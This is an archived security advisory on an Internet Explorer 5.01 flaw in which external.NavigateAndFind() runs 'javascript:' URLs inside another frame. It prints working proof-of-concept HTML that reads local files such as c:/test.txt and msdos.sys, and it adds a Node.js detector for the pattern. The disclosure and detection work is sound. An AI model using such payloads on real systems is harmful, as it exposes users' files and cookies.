COMMAND

    Internet Explorer (external.NavigateAndFind() )

SYSTEMS AFFECTED

    IE 5.01

PROBLEM

    Georgi Guninski found the following.  Internet Explorer 5.01 under
    Windows 95 and 5.0 under WinNT 4.0 (other versions are presumably
    also vulnerable) allow circumventing the "Cross frame security
    policy" by using external.NavigateAndFind().  This exposes the
    whole DOM of the target document, which allows reading local text
    and HTML files and files from any host (reading files of any type
    is presumably possible), getting cookies (dangerous because they
    may contain passwords, etc.) and other sensitive information.  In
    some cases it is also possible to read files behind a firewall.
    This vulnerability may be exploited using an HTML email message or
    a newsgroup posting.

    window.external.NavigateAndFind() is used to search for strings in
    a specified URL, displaying the result in a specified frame.  The
    problem is that it also accepts "javascript:" URLs as the search
    target.  In that case the code in the "javascript:" URL is executed
    in the security context of the target frame, so it has access to
    whatever document is loaded in that frame, regardless of origin.
    Examine the code below for more information.

    The code is:

        <!-- load a local file into a named frame -->
        <IFRAME NAME="I1" SRC="file://c:/test.txt"></IFRAME>
        <SCRIPT>
        function f()
        {
            /* the javascript: URL runs in frame I1's security context */
            window.external.NavigateAndFind("javascript:alert(document.body.innerText);","ll","I1");
        }
        /* wait for the frame to finish loading before searching */
        setTimeout("f()",2000);
        </SCRIPT>

    Demonstration is available at

        http://www.nat.bg/~joro/navan.html

    Scott  Morris  altered  the  script  to  the  following, and under
    Netscape 4.06, it  caused Win95B to  reboot immediately.   He also
    tried it  under IE4.0,  and it  loaded the  msdos.sys file  to the
    text window, as expected.

        <html>
        <IFRAME NAME="I1" SRC="file://c:/msdos.sys"></IFRAME>
        <SCRIPT>
        function f()
        {
            window.external.NavigateAndFind("javascript:alert(document.body.innerText);","ll","I1");
        }
        setTimeout("f()",2000);
        </SCRIPT>
        </html>
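    As an added example (not part of the advisory, Guninski's demonstration
    or Scott Morris's variant), the following Node.js script shows how a
    mail or news gateway could flag the pattern described above in
    incoming HTML: a NavigateAndFind() call whose URL argument uses the
    "javascript:" scheme.  The sample HTML and the example.invalid URL are
    constructed for the example.

```javascript
// Added example: scan untrusted HTML (an HTML e-mail body or newsgroup
// post) for external.NavigateAndFind() calls whose search URL uses the
// "javascript:" scheme, the abuse pattern the advisory describes.

// Matches NavigateAndFind( <url>, <search string>, <target frame> ) with
// three quoted string arguments, tolerating whitespace and either quote
// style.  Deliberately permissive: a miss costs more than a false positive.
const CALL_RE = /NavigateAndFind\s*\(\s*(['"])([\s\S]*?)\1\s*,\s*(['"])([\s\S]*?)\3\s*,\s*(['"])([\s\S]*?)\5\s*\)/gi;

// Normalise a URL argument before checking its scheme: decode numeric HTML
// entities (the call may sit in an event-handler attribute, where the HTML
// parser decodes them), strip control characters and whitespace, and
// lower-case.  JavaScript string escapes (e.g. \x6a) are not undone here.
function normaliseUrl(raw) {
  return raw
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => String.fromCharCode(parseInt(d, 10)))
    .replace(/[\u0000-\u0020]/g, "")
    .toLowerCase();
}

// Returns one finding per NavigateAndFind() call whose URL argument is a
// javascript: URL; http:, file: and other schemes are left alone.
function findNavigateAndFindAbuse(html) {
  const findings = [];
  for (const m of html.matchAll(CALL_RE)) {
    if (normaliseUrl(m[2]).startsWith("javascript:")) {
      findings.push({ url: m[2], searchString: m[4], targetFrame: m[6] });
    }
  }
  return findings;
}

// Constructed sample: the advisory's proof-of-concept shape plus a benign
// call that searches an http: URL and must not be flagged.
const SAMPLE = `
<IFRAME NAME="I1" SRC="file://c:/test.txt"></IFRAME>
<SCRIPT>
window.external.NavigateAndFind("javascript:alert(document.body.innerText);","ll","I1");
window.external.NavigateAndFind("http://example.invalid/page.html","ll","I1");
</SCRIPT>`;

console.log(findNavigateAndFindAbuse(SAMPLE));
```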

SOLUTION

    Disable Active Scripting